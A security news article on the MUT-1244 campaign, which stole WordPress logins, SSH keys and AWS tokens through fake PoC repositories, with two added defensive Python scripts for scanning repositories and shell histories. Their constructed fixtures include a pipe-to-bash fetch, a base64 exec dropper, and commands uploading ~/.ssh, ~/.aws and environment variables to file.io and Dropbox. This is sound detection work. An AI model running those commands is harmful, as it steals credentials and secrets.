A cybercriminal group tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a massive, year-long operation that targeted other hackers with a rigged WordPress credentials checker.
According to researchers at Datadog Security Labs, the attackers didn’t stop at stealing login details: they also collected SSH private keys and AWS access tokens from hundreds of victims, among them malicious actors, penetration testers, red teamers, and security researchers.
The attackers used a layered approach to infect their targets. They lured victims with trojanized GitHub repositories containing fake proof-of-concept (PoC) exploits for known vulnerabilities, and they ran phishing campaigns that tricked users into installing a fake “kernel upgrade” presented as a CPU microcode update.
The phishing emails got users to run the malicious commands themselves, while the fake GitHub repositories targeted people searching for exploit code. The repositories mimicked legitimate sources closely enough to fool even seasoned professionals.
“Several of these repositories were automatically included in legitimate feeds, like Feedly Threat Intelligence or Vulnmon, which made them appear even more credible,” the researchers explained.
The attackers used several payload-delivery methods: backdoored configuration files, malware embedded in PDFs, Python-based droppers, and malicious npm packages slipped into project dependencies.
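The delivery channels listed above are exactly what a static triage of a freshly cloned “PoC” repository should look for before anything in it is run. The script below is an added example written for this article, not code from Datadog’s report or from the MUT-1244 repositories; its rules (npm lifecycle hooks in package.json, `curl … | sh` in config files, `exec()` fed by a decoder in Python files, long base64 blobs, PDF keys that trigger actions on open) are generic heuristics, and the sample repository, thresholds and file names are constructed for illustration.

```python
"""Static triage of a cloned "PoC" repository, run before anything in it executes.

Added example; not code from Datadog's report or from the MUT-1244 repositories.
The rules encode the delivery channels named in the article (backdoored config
files, PDFs, Python droppers, npm dependencies) as generic heuristics. The
thresholds, file names and the sample repository below are constructed.
"""
import base64
import json
import os
import re
import tempfile

# npm runs these lifecycle scripts automatically during `npm install`.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# A long run of base64 alphabet is a common way to smuggle a second stage.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
# exec()/eval() fed by a decoder on the same line: the classic Python dropper.
DYNAMIC_EXEC = re.compile(r"\b(exec|eval)\s*\([^\n]*(b64decode|decodebytes|codecs\.decode|fromhex)")
# PDF dictionary keys that make a reader run something when the file opens.
PDF_ACTIVE = [b"/JavaScript", b"/JS", b"/Launch", b"/OpenAction", b"/EmbeddedFile"]


def scan_repo(root):
    """Walk `root` and return a list of (relative_path, rule, evidence)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read()
            if data.startswith(b"%PDF"):
                hits = [k.decode() for k in PDF_ACTIVE if k in data]
                if hits:
                    findings.append((rel, "pdf_active_content", ",".join(hits)))
                continue  # binary; the text rules below do not apply
            text = data.decode("utf-8", errors="ignore")
            if name == "package.json":
                try:
                    scripts = json.loads(text).get("scripts", {})
                except ValueError:
                    scripts = {}
                for hook in sorted(NPM_HOOKS & set(scripts)):
                    findings.append((rel, "npm_install_hook", f"{hook}: {scripts[hook]}"))
            m = B64_BLOB.search(text)
            if m:
                findings.append((rel, "base64_blob", f"{len(m.group(0))} chars"))
            m = PIPE_TO_SHELL.search(text)
            if m:
                findings.append((rel, "pipe_to_shell", m.group(0).strip()))
            if name.endswith(".py"):
                m = DYNAMIC_EXEC.search(text)
                if m:
                    findings.append((rel, "dynamic_exec", m.group(0)[:60]))
    return findings


def build_sample_repo(root):
    """Write a constructed repo that exhibits each pattern, plus a clean README."""
    stage2 = base64.b64encode(b"print('second stage would run here')" * 8).decode()
    files = {
        "README.md": "# PoC\nRun exploit.py against the target.\n",
        "exploit.py": "import base64\nPAYLOAD = '" + stage2 + "'\n"
                      "exec(base64.b64decode(PAYLOAD))  # dropper, not the advertised PoC\n",
        "package.json": json.dumps({"name": "poc", "scripts": {"postinstall": "node setup.js"}}),
        "config.yml": "setup:\n  cmd: curl -fsSL https://example.invalid/x.sh | bash\n",
        "paper.pdf": "%PDF-1.4\n1 0 obj << /OpenAction << /S /JavaScript /JS (app.alert(1)) >> >> endobj\n",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)


def demo():
    """Build the constructed repo in a temp dir and return what the scanner flags."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_repo(root)
        return scan_repo(root)


if __name__ == "__main__":
    for rel, rule, evidence in demo():
        print(f"{rule:20s} {rel:14s} {evidence}")
```

Point `scan_repo()` at a real clone to use it; every hit is a reason to read the file by hand, not a verdict, and a clean result only means none of these particular tricks is present.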
This campaign overlaps with an attack described in a Checkmarx report from November. That attack involved the GitHub project “hpc20235/yawpp,” which pulled in a tampered npm package, “0xengine/xmlrpc,” to steal sensitive data and mine Monero cryptocurrency.
The malware MUT-1244 deployed combined a backdoor with a cryptocurrency miner. It exfiltrated sensitive information such as SSH keys, AWS credentials, and environment variables to Dropbox and file.io, and the credentials for those services were hardcoded in the malware so the attackers could retrieve the uploads at will.
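The exfiltration pattern just described (credential material read from the host and pushed to Dropbox or file.io, with a token sitting in the command) is something an incident responder can hunt for in shell histories and command-line audit logs. The triage script below is an added example written for this article, not code from Datadog’s report or from the MUT-1244 malware; the history it runs over is constructed, the regexes are generic heuristics, and it deliberately also catches the two-step variant where `~/.ssh` and `~/.aws` are archived first and the archive is uploaded on a later line.

```python
"""Triage of a shell history (or any command-line log) for the exfiltration
pattern the article describes: credential material (SSH keys, AWS credentials,
environment variables) pushed to Dropbox or file.io, sometimes with an access
token hardcoded in the command.

Added example; not code from Datadog's report or from the MUT-1244 malware.
SAMPLE_HISTORY is constructed, and the regexes are heuristics: they will also
flag a legitimate backup of ~/.ssh to Dropbox, so every hit needs a human look.
"""
import re

# Sources a credential thief reaches for on a Linux host.
CRED_SOURCE = re.compile(
    r"(~|/root|/home/[^/\s]+)/\.(ssh|aws)\b|\bid_(rsa|ed25519|ecdsa|dsa)\b"
    r"|\.aws/credentials|\b(printenv|env)\b|/proc/self/environ|\.bash_history"
)
UPLOAD_HOSTS = ("file.io", "dropboxapi.com", "dropbox.com")
# Ways curl/wget attach a local file (or stdin, "@-") to an upload.
UPLOAD_ARG = re.compile(r"(?:=@|--data-binary\s+@|-d\s+@|-T\s+|--upload-file\s+)[\"']?([^\s\"']+)")
# Archivers that stage several files into one before upload; group 1/2 = output path.
STAGE_OUT = re.compile(r"\btar\s+-?[a-zA-Z]*f\s+(\S+)|\bzip\s+(?:-\S+\s+)*(\S+)")
BEARER = re.compile(r"Authorization:\s*Bearer\s+([A-Za-z0-9._\-]+)", re.I)


def _redact(cmd):
    """Keep only a token prefix so findings can be shared without re-leaking it."""
    return BEARER.sub(lambda b: "Authorization: Bearer " + b.group(1)[:4] + "...", cmd)


def triage_history(lines):
    """Return [(line_no, rule, detail)] for suspicious commands in `lines`."""
    findings = []
    staged = set()  # archive paths built from credential sources earlier in the log
    for n, cmd in enumerate(lines, 1):
        reads_creds = bool(CRED_SOURCE.search(cmd))
        uploads = any(h in cmd for h in UPLOAD_HOSTS) and re.search(r"\b(curl|wget)\b", cmd)
        m = STAGE_OUT.search(cmd)
        if reads_creds and m:
            staged.add(m.group(1) or m.group(2))
        if uploads:
            targets = UPLOAD_ARG.findall(cmd)
            hit = [t for t in targets if t in staged]
            if reads_creds:
                findings.append((n, "direct_exfil", _redact(cmd)))
            elif hit:
                findings.append((n, "staged_exfil", "uploads " + ", ".join(hit)))
            b = BEARER.search(cmd)
            if b:
                findings.append((n, "hardcoded_token", "Bearer " + b.group(1)[:4] + "..."))
    return findings


# Constructed history: lines 2-4 are the pattern under discussion, the rest is noise.
SAMPLE_HISTORY = [
    "cd /opt/poc && python3 exploit.py",
    "tar czf /tmp/.cache.tgz ~/.ssh ~/.aws",
    'curl -s -F "file=@/tmp/.cache.tgz" https://file.io',
    'env | curl -s --data-binary @- -H "Authorization: Bearer sl.ABCDEFGH" '
    '-H \'Dropbox-API-Arg: {"path": "/env.txt"}\' https://content.dropboxapi.com/2/files/upload',
    "ls -la",
    "curl -s https://example.invalid/update.sh -o /tmp/update.sh",
]

if __name__ == "__main__":
    for n, rule, detail in triage_history(SAMPLE_HISTORY):
        print(f"line {n}: {rule}: {detail}")
```

Feed it `~/.bash_history`, `~/.zsh_history` or the `proctitle`/`EXECVE` fields from auditd, one command per line; the staging logic is why the archive line and the upload line are judged together rather than in isolation.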
How It All Worked
The attackers gained access to the WordPress credentials through their rigged tool, “yawpp,” marketed as a credentials checker. The threat actors who ran it had most likely bought those credentials on underground markets and used yawpp to validate them, handing the working logins to MUT-1244 in the process. Ironically, the very tool used to verify stolen logins became the means of its users’ own compromise.
MUT-1244 exploited the trust within the cybersecurity community, infecting machines belonging to both ethical hackers and malicious actors. Once the malware ran, it carried out extensive data theft, taking SSH keys, AWS tokens, and even command histories.
Datadog researchers believe this campaign is still ongoing, with hundreds of systems remaining compromised and new infections continuing to surface.
Bijay Pokharel